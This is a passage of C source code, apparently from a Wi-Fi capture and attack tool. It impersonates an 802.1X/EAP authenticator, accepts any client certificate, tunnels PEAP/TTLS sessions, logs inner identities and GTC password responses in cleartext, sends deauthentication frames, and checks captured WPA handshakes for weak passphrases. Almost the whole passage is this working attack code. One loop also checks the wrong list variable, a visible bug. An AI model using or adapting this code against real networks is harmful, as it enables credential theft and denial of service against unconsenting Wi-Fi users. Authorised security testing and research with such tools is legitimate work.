-1)) ? " FIN" : ""); else sprintf(outstr, "EAP RESPONSE TYPE %s EAPTIME:%" PRIu64 " ID:%d REQ:%d%s%s" , eap_type2name(exteap->type), timestamp -lastauthtimestamp, exteap->id, zeiger->eapctx.reqstate, zeiger->eapctx.tlstun ? " TLS":"", (zeiger->eapctx.reqstate == (eapreqentries -1)) ? " FIN" : ""); #else if(exteap->type == EAP_TYPE_NAK) sprintf(outstr, "EAP RESPONSE TYPE NAK:%s EAPTIME:%" PRIu64 " REQ:%d%s%s" , eap_type2name(exteap->data[0]), timestamp -lastauthtimestamp, zeiger->eapctx.reqstate, zeiger->eapctx.tlstun ? " TLS":"", (zeiger->eapctx.reqstate == (eapreqentries -1)) ? " FIN" : ""); else sprintf(outstr, "EAP RESPONSE TYPE %s EAPTIME:%" PRIu64 " REQ:%d%s%s" , eap_type2name(exteap->type), timestamp -lastauthtimestamp, zeiger->eapctx.reqstate, zeiger->eapctx.tlstun ? " TLS":"", (zeiger->eapctx.reqstate == (eapreqentries -1)) ? " FIN" : ""); #endif printown(zeiger, outstr); } if(eapreqlist[eapctx->reqstate].termination == 0) { if(eapctx->reqstate < (eapreqentries -1)) send_eap_status_resp(EAP_CODE_FAILURE, exteap->id, eapreqlist[eapctx->reqstate].type); else send_deauthentication2client(macfrx->addr2, macfrx->addr1, reasoncode); } else { if(eapreqlist[eapctx->reqstate].termination != EAPREQLIST_TERM_NOTERM) { if(eapreqlist[eapctx->reqstate].termination == EAPREQLIST_TERM_DEAUTH) send_deauthentication2client(macfrx->addr2, macfrx->addr1, reasoncode); else if(eapreqlist[eapctx->reqstate].termination == EAPREQLIST_TERM_ENDTLS) { if(eapctx->tlstun == true) { SSL_shutdown(eaptlsctx->ssl); send_eap_tls(eapctx, NULL, 0); SSL_free(eaptlsctx->ssl); eaptlsctx->ssl = NULL; eapctx->tlstun = false; } } else send_eap_status_resp(eapreqlist[eapctx->reqstate].termination, exteap->id, eapreqlist[eapctx->reqstate].type); } } if(exteap->id == eapctx->id) { if((exteap->type == EAP_TYPE_NAK) && (eapreqfollownakflag == true)) { eapreqentry = eapreqlist_gettype(eapctx, exteap->data[0]); if(eapreqentry > 0) eapctx->reqstate = eapreqentry -1; } while(++eapctx->reqstate < eapreqentries) { if((eapreqlist[eapctx->reqstate].mode == EAPREQLIST_MODE_TLS) && (eapctx->tlstun == false)) continue; eapctx->id++; eapctx->type = eapreqlist[eapctx->reqstate].type; send_eap_request(eapctx->id, eapreqlist[eapctx->reqstate].type, eapreqlist[eapctx->reqstate].data, eapreqlist[eapctx->reqstate].length); break; } if(eapctx->reqstate == eapreqentries) { send_deauthentication2client(macfrx->addr2, macfrx->addr1, WLAN_REASON_IEEE_802_1X_AUTH_FAILED); } } } return; } memset(zeiger, 0, OWNLIST_SIZE); zeiger->timestamp = timestamp; zeiger->status = OW_EAP_RESP; memcpy(zeiger->ap, macfrx->addr1, 6); memcpy(zeiger->client, macfrx->addr2, 6); if(filtermode != 0) { if(setclientfilter(zeiger) == true) { qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_MANAGEMENT) == PCAPNG_FRAME_MANAGEMENT) writeepb(fd_pcapng); } if((((exteap->type != EAP_TYPE_NAK) && ((statusout &STATUS_EAP) == STATUS_EAP)) || ((exteap->type == EAP_TYPE_NAK) && ((statusout &STATUS_EAP_NAK) == STATUS_EAP_NAK)))) { sprintf(outstr, "EAP RESPONSE TYPE %s", eap_type2name(exteap->type)); printown(zeiger, outstr); } qsort(ownlist, zeiger -ownlist +1, OWNLIST_SIZE, sort_ownlist_by_time); return; } return; } /*===========================================================================*/ static inline int eap_tls_clientverify_cb(int preverify_ok, X509_STORE_CTX *x509_store_ctx) { (void)preverify_ok; (void)x509_store_ctx; return 1; } /*===========================================================================*/ static inline void process80211exteaptls_resp_eap(ownlist_t *ownzeiger, uint8_t *data, int data_len) { static exteap_t *eapin; int eapinlen; eapctx_t *eapctx = &ownzeiger->eapctx; static char outstr[EAP_LEN_MAX]; if((data_len <= 0) && (eapctx->inner_id == 0)) { send_eap_tls_eap_request(eapctx, eapctx->inner_id, EAP_TYPE_ID, NULL, 0); eapctx->inner_type = EAP_TYPE_ID; return; } eapin = (exteap_t*)data; eapinlen = (int)ntohs(eapin->len); if(eapinlen != data_len) return; if(eapin->code == EAP_CODE_RESP) { if(eapin->id != eapctx->inner_id) return; if((eapin->type != eapctx->inner_type) && (eapin->type != EAP_TYPE_NAK)) return; if(eapin->type == EAP_TYPE_ID) { if((statusout &STATUS_EAP) == STATUS_EAP) { snprintf(outstr, EAP_LEN_MAX, "EAP RESPONSE Phase2 TYPE ID:'%s' EAPTIME:%" PRIu64 " REQ:%d%s", strclean((char*)&eapin->data[0], data_len -EXTEAP_SIZE), timestamp -lastauthtimestamp, ownzeiger->eapctx.reqstate, (ownzeiger->eapctx.reqstate == eapreqentries) ? " FIN" : ""); printown(ownzeiger, outstr); } } else if(eapin->type == EAP_TYPE_GTC) { if((statusout &STATUS_EAP) == STATUS_EAP) { snprintf(outstr, EAP_LEN_MAX, "EAP RESPONSE Phase2 TYPE GTC:'%s' EAPTIME:%" PRIu64 " REQ:%d%s", strclean((char*)&eapin->data[0], data_len -EXTEAP_SIZE), timestamp -lastauthtimestamp, ownzeiger->eapctx.reqstate, (ownzeiger->eapctx.reqstate == eapreqentries) ? " FIN" : ""); printown(ownzeiger, outstr); } } else { if((((eapin->type != EAP_TYPE_NAK) && ((statusout &STATUS_EAP) == STATUS_EAP)) || ((eapin->type == EAP_TYPE_NAK) && ((statusout &STATUS_EAP_NAK) == STATUS_EAP_NAK)))) { snprintf(outstr, EAP_LEN_MAX, "EAP RESPONSE Phase2 TYPE %s EAPTIME:%" PRIu64 " REQ:%d%s", eap_type2name(eapin->type), timestamp -lastauthtimestamp, ownzeiger->eapctx.reqstate, (ownzeiger->eapctx.reqstate == eapreqentries) ? " FIN" : ""); printown(ownzeiger, outstr); } } if(eapreqlist[ownzeiger->eapctx.reqstate].termination == 0) { if(ownzeiger->eapctx.reqstate < (eapreqentries -1)) send_eap_tls_eap(eapctx, EAP_CODE_FAILURE, eapin->id, eapreqlist[ownzeiger->eapctx.reqstate].type, NULL, 0); else send_deauthentication2client(macfrx->addr2, macfrx->addr1, reasoncode); } else { if(eapreqlist[ownzeiger->eapctx.reqstate].termination != EAPREQLIST_TERM_NOTERM) { if(eapreqlist[ownzeiger->eapctx.reqstate].termination == EAPREQLIST_TERM_DEAUTH) send_deauthentication2client(macfrx->addr2, macfrx->addr1, reasoncode); else if(eapreqlist[ownzeiger->eapctx.reqstate].termination == EAPREQLIST_TERM_ENDTLS) { SSL_shutdown(eaptlsctx->ssl); send_eap_tls(eapctx, NULL, 0); send_eap_status_resp(EAP_CODE_FAILURE, eapctx->id, eapctx->type); eapctx->tlstun = false; while(++ownzeiger->eapctx.reqstate < eapreqentries) { if(eapreqlist[ownzeiger->eapctx.reqstate].mode == EAPREQLIST_MODE_TLS) continue; eapctx->id++; eapctx->type = eapreqlist[ownzeiger->eapctx.reqstate].type; send_eap_request(eapctx->id, eapreqlist[ownzeiger->eapctx.reqstate].type, eapreqlist[ownzeiger->eapctx.reqstate].data, eapreqlist[ownzeiger->eapctx.reqstate].length); break; } if(ownzeiger->eapctx.reqstate == eapreqentries) { send_deauthentication2client(macfrx->addr2, macfrx->addr1, WLAN_REASON_IEEE_802_1X_AUTH_FAILED); } return; } else send_eap_tls_eap(eapctx, eapreqlist[ownzeiger->eapctx.reqstate].termination, eapin->id, eapin->type, NULL, 0); } } ownzeiger->eapctx.reqstate++; if(ownzeiger->eapctx.reqstate < eapreqentries) { eapctx->inner_id++; eapctx->inner_type = eapreqlist[ownzeiger->eapctx.reqstate].type; send_eap_tls_eap_request(eapctx, eapctx->inner_id, eapreqlist[ownzeiger->eapctx.reqstate].type, eapreqlist[ownzeiger->eapctx.reqstate].data, eapreqlist[ownzeiger->eapctx.reqstate].length); } else { SSL_shutdown(eaptlsctx->ssl); send_eap_tls(eapctx, NULL, 0); eapctx->tlstun = false; send_deauthentication2client(macfrx->addr2, macfrx->addr1, WLAN_REASON_IEEE_802_1X_AUTH_FAILED); } } return; } /*===========================================================================*/ static inline void process80211exteap_resp_tls(uint16_t exteaplen) { static ownlist_t *zeiger; static uint8_t *eapauthptr; static exteap_t *exteap; static exteap_t *outexteap; eapauthptr = payloadptr +LLC_SIZE +EAPAUTH_SIZE; exteap = (exteap_t*)eapauthptr; int tlsdataoffset; size_t tlsdatalen; static char outstr[STATUSMSG_MAX]; static uint8_t tlsflags; static uint8_t inbuf[65536]; static uint16_t inbuflen; eapctx_t *eapctx; static int res, err; static unsigned long tlserror; static bool tlsabort; if(exteaplen < EAPAUTH_SIZE) return; if((timestamp -lastauthtimestamp) > eapoleaptimeoutvalue) return; if(memcmp(&lastauthap, macfrx->addr1, 6) != 0) return; if(!((macfrx->to_ds == 1) && (macfrx->from_ds == 0))) return; send_ack(); for(zeiger = ownlist; zeiger < ownlist +OWNLIST_MAX; zeiger++) { if(zeiger->timestamp == 0) break; if((memcmp(zeiger->ap, macfrx->addr1, 6) != 0) || (memcmp(zeiger->client, macfrx->addr2, 6) != 0)) continue; if((zeiger->status &FILTERED) == FILTERED) return; eapctx = &zeiger->eapctx; if(((eapctx->tlstun == false) && (eaptlsctx->ssl != NULL)) || ((eapctx->tlstun == true) && ((timestamp -zeiger->timestamp) > EAPTLS_TIMEOUT))) { SSL_free(eaptlsctx->ssl); eaptlsctx->ssl = NULL; eapctx->tlstun = false; } zeiger->timestamp = timestamp; if((fd_pcapng > 0) && ((eaptlsctx->ssl == NULL) || (SSL_is_init_finished(eaptlsctx->ssl) == 0))) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } if(exteaplen <= EXTEAP_SIZE) return; tlsflags = exteap->data[0]; if(exteap->id != eapctx->id) return; if(eaptlsctx->ssl == NULL) { eaptlsctx->ssl = SSL_new(tlsctx); SSL_set_accept_state(eaptlsctx->ssl); eaptlsctx->tls_in = BIO_new(BIO_s_mem()); eaptlsctx->tls_out = BIO_new(BIO_s_mem()); eapctx->version = ((tlsflags &EAP_TLSFLAGS_VERSION)); SSL_set_bio(eaptlsctx->ssl, eaptlsctx->tls_in, eaptlsctx->tls_out); if((((exteap->type != EAP_TYPE_NAK) && ((statusout &STATUS_EAP) == STATUS_EAP)) || ((exteap->type == EAP_TYPE_NAK) && ((statusout &STATUS_EAP_NAK) == STATUS_EAP_NAK)))) { #ifdef DEBUG_TLS sprintf(outstr, "EAP RESPONSE TYPE %s EAPTIME:%" PRIu64 " ID:%d REQ:%d TLSSTART", eap_type2name(exteap->type), timestamp -lastauthtimestamp, exteap->id, zeiger->eapctx.reqstate); #else sprintf(outstr, "EAP RESPONSE TYPE %s EAPTIME:%" PRIu64 " REQ:%d", eap_type2name(exteap->type), timestamp -lastauthtimestamp, zeiger->eapctx.reqstate); #endif printown(zeiger, outstr); } eapctx->tlstun = true; } if((SSL_in_init(eaptlsctx->ssl) == false) && (SSL_is_init_finished(eaptlsctx->ssl) == false)) { SSL_do_handshake(eaptlsctx->ssl); } tlsdataoffset = EAP_TLSFLAGS_SIZE; if((tlsflags &EAP_TLSFLAGS_LENGTH_INCL) == EAP_TLSFLAGS_LENGTH_INCL) { memcpy(&eaptlsctx->tlslen, &exteap->data[EAP_TLSFLAGS_SIZE], EAP_TLSLENGTH_SIZE); eaptlsctx->tlslen = ntohl(eaptlsctx->tlslen); tlsdataoffset += EAP_TLSLENGTH_SIZE; } tlsdatalen = exteaplen -EXTEAP_SIZE -tlsdataoffset; if(eaptlsctx->fragments_tx == true) { eaptlsctx->buflen = eaptlsctx->tlslen -eaptlsctx->txpos +EAP_TLSFLAGS_SIZE +EAP_TLSLENGTH_SIZE; if(eaptlsctx->buflen < (EAP_LEN_MAX -EXTEAP_SIZE -EAP_TLSFLAGS_SIZE)) { tlsflags &= ~(EAP_TLSFLAGS_MORE_FRAGMENTS | EAP_TLSFLAGS_LENGTH_INCL); eaptlsctx->fragments_tx = false; eaptlsctx->tlslen = 0; } else { tlsflags |= (EAP_TLSFLAGS_MORE_FRAGMENTS); eaptlsctx->buflen = EAP_LEN_MAX -EXTEAP_SIZE -EAP_TLSFLAGS_SIZE -EAP_TLSLENGTH_SIZE; } eaptlsctx->buf[eaptlsctx->txpos -EAP_TLSFLAGS_SIZE] = tlsflags; eapctx->id++; send_eap_request(eapctx->id, eapctx->type, &eaptlsctx->buf[eaptlsctx->txpos -EAP_TLSFLAGS_SIZE], eaptlsctx->buflen +EAP_TLSFLAGS_SIZE); #ifdef DEBUG_TLS snprintf(debugmsg, DEBUGMSG_MAX, "TLS out sending next fragment len=%d", (int)eaptlsctx->buflen); debugprint(0, NULL, debugmsg); #endif eaptlsctx->txpos += eaptlsctx->buflen; return; } if((eaptlsctx->buflen +tlsdatalen) > EAPTLSCTX_BUF_SIZE) { #ifdef DEBUG_TLS snprintf(debugmsg, DEBUGMSG_MAX, "TLS received cumulative data len=%d > EAPTLSCTX_BUF_SIZE=%d", (int)(eaptlsctx->buflen +tlsdatalen), EAPTLSCTX_BUF_SIZE); debugprint(0, NULL, debugmsg); #endif return; } memcpy(&eaptlsctx->buf[eaptlsctx->buflen], &exteap->data[tlsdataoffset], tlsdatalen); eaptlsctx->buflen += tlsdatalen; if((tlsflags &EAP_TLSFLAGS_MORE_FRAGMENTS) == EAP_TLSFLAGS_MORE_FRAGMENTS) { eaptlsctx->fragments_rx = true; eapctx->id++; send_eap_request(eapctx->id, eapctx->type, NULL, 0); return; } #ifdef DEBUG_TLS if((eaptlsctx->tlslen > 0) && (eaptlsctx->buflen != eaptlsctx->tlslen)) { snprintf(outstr, STATUSMSG_MAX, "TLS warning: indicated tlslen != received buflen (%d != %d)\n", eaptlsctx->tlslen, (int)eaptlsctx->buflen); debugprint(0, NULL, outstr); } #endif if(eaptlsctx->fragments_rx == true) BIO_write(eaptlsctx->tls_in, &eaptlsctx->buf, eaptlsctx->buflen); else BIO_write(eaptlsctx->tls_in, &exteap->data[tlsdataoffset], tlsdatalen); eaptlsctx->buflen = 0; eaptlsctx->fragments_rx = false; eaptlsctx->fragments_tx = false; if((SSL_get_shutdown(eaptlsctx->ssl) & SSL_SENT_SHUTDOWN) == SSL_SENT_SHUTDOWN) { res = SSL_shutdown(eaptlsctx->ssl); #ifdef DEBUG_TLS if(res == 1) debugprint(0, NULL, "TLS received close notify"); #endif eapctx->tlstun = false; SSL_free(eaptlsctx->ssl); eaptlsctx->ssl = NULL; return; } if(!SSL_is_init_finished(eaptlsctx->ssl)) { ERR_clear_error(); res = SSL_accept(eaptlsctx->ssl); if(res == 1) { if((statusout &STATUS_EAP) == STATUS_EAP) { snprintf(outstr, STATUSMSG_MAX, "EAP TLS connect EAPTIME:%" PRIu64, timestamp -lastauthtimestamp); printown(zeiger, outstr); } } else { err = SSL_get_error(eaptlsctx->ssl, res); tlsabort = false; if((err != SSL_ERROR_WANT_READ) && (err != SSL_ERROR_WANT_WRITE)) { tlserror = ERR_get_error(); #ifdef DEBUG_TLS snprintf(debugmsg, DEBUGMSG_MAX, "TLS Error %d, tlserror %" PRIu64 " reason %d level %d ", err, (uint64_t)tlserror, ERR_GET_REASON(tlserror), ERR_FATAL_ERROR(tlserror)); debugprint(0, NULL, debugmsg); #endif if(ERR_FATAL_ERROR(tlserror)) tlsabort = true; switch(ERR_GET_REASON(tlserror)) { case SSL_R_TLSV1_ALERT_UNKNOWN_CA: case SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC: tlsabort = true; break; } if(tlsabort == true) { SSL_free(eaptlsctx->ssl); eaptlsctx->ssl = NULL; eapctx->tlstun = false; send_eap_status_resp(EAP_CODE_FAILURE, eapctx->id, eapctx->type); if((statusout &STATUS_EAP) == STATUS_EAP) { snprintf(outstr, STATUSMSG_MAX, "EAP TLS abort '%s' EAPTIME:%" PRIu64, ERR_reason_error_string(tlserror), timestamp -lastauthtimestamp); printown(zeiger, outstr); } while(++eapctx->reqstate < eapreqentries) { if(eapreqlist[eapctx->reqstate].mode == EAPREQLIST_MODE_TLS) continue; eapctx->id++; eapctx->type = eapreqlist[eapctx->reqstate].type; send_eap_request(eapctx->id, eapreqlist[eapctx->reqstate].type, eapreqlist[eapctx->reqstate].data, eapreqlist[eapctx->reqstate].length); break; } if(eapctx->reqstate == eapreqentries) { send_deauthentication2client(macfrx->addr2, macfrx->addr1, WLAN_REASON_IEEE_802_1X_AUTH_FAILED); } return; } } #ifdef DEBUG_TLS if (err == SSL_ERROR_WANT_READ) debugprint(0, NULL, "TLS SSL_connect - want more data"); else if (err == SSL_ERROR_WANT_WRITE) debugprint(0, NULL, "TLS SSL_connect - want to write"); #endif } send_eap_tls(eapctx, NULL, 0); return; } else { res = SSL_read(eaptlsctx->ssl, inbuf, sizeof(inbuf)); #ifdef DEBUG_TLS snprintf(debugmsg, DEBUGMSG_MAX, "TLS connection read len=%d, id=%d:", res, eapctx->id); debugprint(res, inbuf, debugmsg); #endif if(res > 0) { if(eapctx->type == EAP_TYPE_PEAP) { memcpy(payloadptr +LLC_SIZE +EAPAUTH_SIZE, inbuf, res); memcpy(payloadptr +LLC_SIZE +2, inbuf +2, 2); packetlen = packetlen -exteaplen +res; } else { memcpy(payloadptr +LLC_SIZE +EAPAUTH_SIZE +EXTEAP_SIZE, inbuf, res); inbuflen = htons(res +EXTEAP_SIZE); ((eapauth_t*)(payloadptr +LLC_SIZE))->len = inbuflen; outexteap = ((exteap_t*)(payloadptr +LLC_SIZE +EAPAUTH_SIZE)); outexteap->code = EAP_CODE_REQ; outexteap->id = 0xff; outexteap->type = eapctx->type; outexteap->len = inbuflen; packetlen = packetlen -exteaplen +EXTEAP_SIZE +res; } if(fd_pcapng > 0) { if((pcapngframesout &PCAPNG_FRAME_EAP) == PCAPNG_FRAME_EAP) writeepb(fd_pcapng); } } if(eapctx->type == EAP_TYPE_PEAP) process80211exteaptls_resp_eap(zeiger, inbuf, res); return; } } return; } /*===========================================================================*/ static inline void process80211exteap(int authlen) { static uint8_t *eapauthptr; static exteap_t *exteap; static uint16_t exteaplen; static uint8_t lastpacket[EAP_LEN_MAX]; eapauthptr = payloadptr +LLC_SIZE +EAPAUTH_SIZE; exteap = (exteap_t*)eapauthptr; exteaplen = ntohs(exteap->len); if(exteaplen > authlen) return; if(eaptunflag == true) { if((macfrx->retry == 1) && (memcmp(lastauthap, macfrx->addr1, 6) == 0) && (memcmp(exteap, &lastpacket, exteaplen) == 0)) { send_ack(); return; } memcpy(&lastpacket, exteap, exteaplen); switch(exteap->type) { case EAP_TYPE_PEAP: case EAP_TYPE_TTLS: case EAP_TYPE_TLS: if(exteap->code == EAP_CODE_RESP) { process80211exteap_resp_tls(exteaplen); return; } break; } } if(exteap->type == EAP_TYPE_ID) { if(exteap->code == EAP_CODE_REQ) process80211exteap_req_id(exteaplen); else if(exteap->code == EAP_CODE_RESP) process80211exteap_resp_id(exteaplen); } if(exteap->type > EAP_TYPE_ID) { if(exteap->code == EAP_CODE_RESP) process80211exteap_resp(exteaplen); } return; } /*===========================================================================*/ /*===========================================================================*/ static inline bool detectweakwpa(uint8_t keyver, uint8_t essidlen, uint8_t *essid, uint8_t *anonce) { static int authlen; static uint8_t *pmk; static uint8_t *eapauthptr; static eapauth_t *eapauth; static uint8_t *wpakptr; static wpakey_t *wpak; static uint8_t *pkeptr; static size_t testptklen; static size_t testmiclen; static EVP_MD_CTX *mdctx; static EVP_PKEY *pkey; static uint8_t pkedata[102]; static uint8_t testptk[EVP_MAX_MD_SIZE]; static uint8_t testmic[EVP_MAX_MD_SIZE]; static uint8_t keymic[16]; pmk = getpmk(essidlen, essid); if(pmk == NULL) return false; eapauthptr = payloadptr +LLC_SIZE; eapauth = (eapauth_t*)eapauthptr; authlen = ntohs(eapauth->len); wpakptr = eapauthptr +EAPAUTH_SIZE; wpak = (wpakey_t*)wpakptr; memcpy(&keymic, wpak->keymic, 16); memset(wpak->keymic, 0, 16); if(keyver == 2) { memset(&pkedata, 0, sizeof(pkedata)); memset(&testptk, 0, sizeof(testptk)); memset(&testmic, 0, sizeof(testptk)); pkeptr = pkedata; memcpy(pkeptr, "Pairwise key expansion", 23); if(memcmp(macfrx->addr1, macfrx->addr2, 6) < 0) { memcpy(pkeptr +23, macfrx->addr1, 6); memcpy(pkeptr +29, macfrx->addr2, 6); } else { memcpy(pkeptr +23, macfrx->addr2, 6); memcpy(pkeptr +29, macfrx->addr1, 6); } if(memcmp(anonce, wpak->nonce, 32) < 0) { memcpy (pkeptr +35, anonce, 32); memcpy (pkeptr +67, wpak->nonce, 32); } else { memcpy (pkeptr +35, wpak->nonce, 32); memcpy (pkeptr +67, anonce, 32); } testptklen = 32; mdctx = EVP_MD_CTX_new(); if(mdctx == 0) return false; pkey = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, NULL, pmk, 32); if(pkey == NULL) { EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignInit(mdctx, NULL, EVP_sha1(), NULL, pkey) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignUpdate(mdctx, pkedata, 100) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignFinal(mdctx, testptk, &testptklen) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } EVP_PKEY_free(pkey); EVP_MD_CTX_reset(mdctx); testmiclen = 16; pkey = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, NULL, testptk, 16); if(pkey == NULL) { EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignInit(mdctx, NULL, EVP_sha1(), NULL, pkey) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignUpdate(mdctx, eapauthptr, authlen +EAPAUTH_SIZE) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignFinal(mdctx, testmic, &testmiclen) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); if(memcmp(&keymic, &testmic, 16) == 0) return true; } else if(keyver == 1) { memset(&pkedata, 0, sizeof(pkedata)); memset(&testptk, 0, sizeof(testptk)); memset(&testmic, 0, sizeof(testptk)); pkeptr = pkedata; memcpy(pkeptr, "Pairwise key expansion", 23); if(memcmp(macfrx->addr1, macfrx->addr2, 6) < 0) { memcpy(pkeptr +23, macfrx->addr1, 6); memcpy(pkeptr +29, macfrx->addr2, 6); } else { memcpy(pkeptr +23, macfrx->addr2, 6); memcpy(pkeptr +29, macfrx->addr1, 6); } if(memcmp(anonce, wpak->nonce, 32) < 0) { memcpy (pkeptr +35, anonce, 32); memcpy (pkeptr +67, wpak->nonce, 32); } else { memcpy (pkeptr +35, wpak->nonce, 32); memcpy (pkeptr +67, anonce, 32); } testptklen = 32; mdctx = EVP_MD_CTX_new(); if(mdctx == 0) return false; pkey = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, NULL, pmk, 32); if(pkey == NULL) { EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignInit(mdctx, NULL, EVP_sha1(), NULL, pkey) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignUpdate(mdctx, pkedata, 100) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignFinal(mdctx, testptk, &testptklen) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } EVP_PKEY_free(pkey); EVP_MD_CTX_reset(mdctx); testmiclen = 16; pkey = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, NULL, testptk, 16); if(pkey == NULL) { EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignInit(mdctx, NULL, EVP_md5(), NULL, pkey) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignUpdate(mdctx, eapauthptr, authlen +EAPAUTH_SIZE) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignFinal(mdctx, testmic, &testmiclen) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); if(memcmp(&keymic, &testmic, 16) == 0) return true; } else if(keyver == 3) { memset(&pkedata, 0, sizeof(pkedata)); memset(&testptk, 0, sizeof(testptk)); memset(&testmic, 0, sizeof(testptk)); pkedata[0] = 1; pkedata[1] = 0; pkeptr = pkedata +2; memcpy(pkeptr, "Pairwise key expansion", 22); if(memcmp(macfrx->addr1, macfrx->addr2, 6) < 0) { memcpy(pkeptr +22, macfrx->addr1, 6); memcpy(pkeptr +28, macfrx->addr2, 6); } else { memcpy(pkeptr +22, macfrx->addr2, 6); memcpy(pkeptr +28, macfrx->addr1, 6); } if(memcmp(anonce, wpak->nonce, 32) < 0) { memcpy (pkeptr +34, anonce, 32); memcpy (pkeptr +66, wpak->nonce, 32); } else { memcpy (pkeptr +34, wpak->nonce, 32); memcpy (pkeptr +66, anonce, 32); } testptklen = 32; mdctx = EVP_MD_CTX_new(); if(mdctx == 0) return false; pkey = EVP_PKEY_new_mac_key(EVP_PKEY_HMAC, NULL, pmk, 32); if(pkey == NULL) { EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignInit(mdctx, NULL, EVP_sha256(), NULL, pkey) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignUpdate(mdctx, pkedata, 102) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignFinal(mdctx, testptk, &testptklen) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } EVP_PKEY_free(pkey); EVP_MD_CTX_reset(mdctx); testmiclen = 16; pkey = EVP_PKEY_new_CMAC_key(NULL, testptk, 16, EVP_aes_128_cbc()); if(pkey == NULL) { EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignInit(mdctx, NULL, NULL, NULL, pkey) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignUpdate(mdctx, eapauthptr, authlen +EAPAUTH_SIZE) != 1) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } if(EVP_DigestSignFinal(mdctx, testmic, &testmiclen) <= 0) { EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); return false; } EVP_PKEY_free(pkey); EVP_MD_CTX_free(mdctx); if(memcmp(&keymic, &testmic, 16) == 0) return true; } return false; } /*===========================================================================*/ static inline void printeapol(uint8_t *client, uint8_t *ap, char *msg, uint64_t timegap, uint64_t rc, uint8_t kdv, uint8_t *anonce) { static int c, p; static macessidlist_t *zeiger; static ownlist_t *zeigerown; static bool pmkflag; static char timestring[16]; static char essidstring[ESSID_LEN_MAX *2 +1]; pmkflag = false; essidstring[0] = 0; for(zeiger = aplist; zeiger < aplist +APLIST_MAX; zeiger++) { if(memcmp(zeiger->ap, ap, 6) == 0) { if((zeiger->essidlen != 0) && (zeiger->essid[0] != 0)) pmkflag = detectweakwpa(kdv, zeiger->essidlen, zeiger->essid, anonce); p = 0; for(c = 0; c < zeiger->essidlen; c++) { if((zeiger->essid[c] < 0x20) || (zeiger->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeiger->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeiger->essid[c]; } essidstring[p] = 0; break; } } if(essidstring[0] == 0) { for(zeiger = rglist; zeiger < rglist +RGLIST_MAX; zeiger++) { if(memcmp(zeiger->ap, ap, 6) == 0) { if((zeiger->essidlen != 0) && (zeiger->essid[0] != 0)) pmkflag = detectweakwpa(kdv, zeiger->essidlen, zeiger->essid, anonce); p = 0; for(c = 0; c < zeiger->essidlen; c++) { if((zeiger->essid[c] < 0x20) || (zeiger->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeiger->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeiger->essid[c]; } essidstring[p] = 0; break; } } } if(essidstring[0] == 0) { for(zeigerown = ownlist; zeigerown < ownlist +OWNLIST_MAX; zeigerown++) { if(memcmp(zeigerown->ap, ap, 6) == 0) { if((zeiger->essidlen != 0) && (zeiger->essid[0] != 0)) pmkflag = detectweakwpa(kdv, zeiger->essidlen, zeiger->essid, anonce); p = 0; for(c = 0; c < zeigerown->essidlen; c++) { if((zeigerown->essid[c] < 0x20) || (zeigerown->essid[c] > 0x7e)) essidstring[p++] = '.'; else if(zeigerown->essid[c] == 0x5c) { essidstring[p++] = 0x5c; essidstring[p++] = 0x5c; } else essidstring[p++] = zeigerown->essid[c]; } essidstring[p] = 0; break; } } } strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); if(essidstring[0] != 0) { if(pmkflag == false) { if(ptrfscanlist->channel >= 100) snprintf(servermsg, SERVERMSG_MAX, "%s %d/%d %02x%02x%02x%02x%02x%02x %02x%02x%02x%02x%02x%02x %s [EAPOL:%s EAPOLTIME:%" PRIu64 " RC:%" PRIu64 " KDV:%d]\n", timestring, ptrfscanlist->frequency, ptrfscanlist->channel, client[0], client[1], client[2], client[3], client[4], client[5], ap[0], ap[1], ap[2], 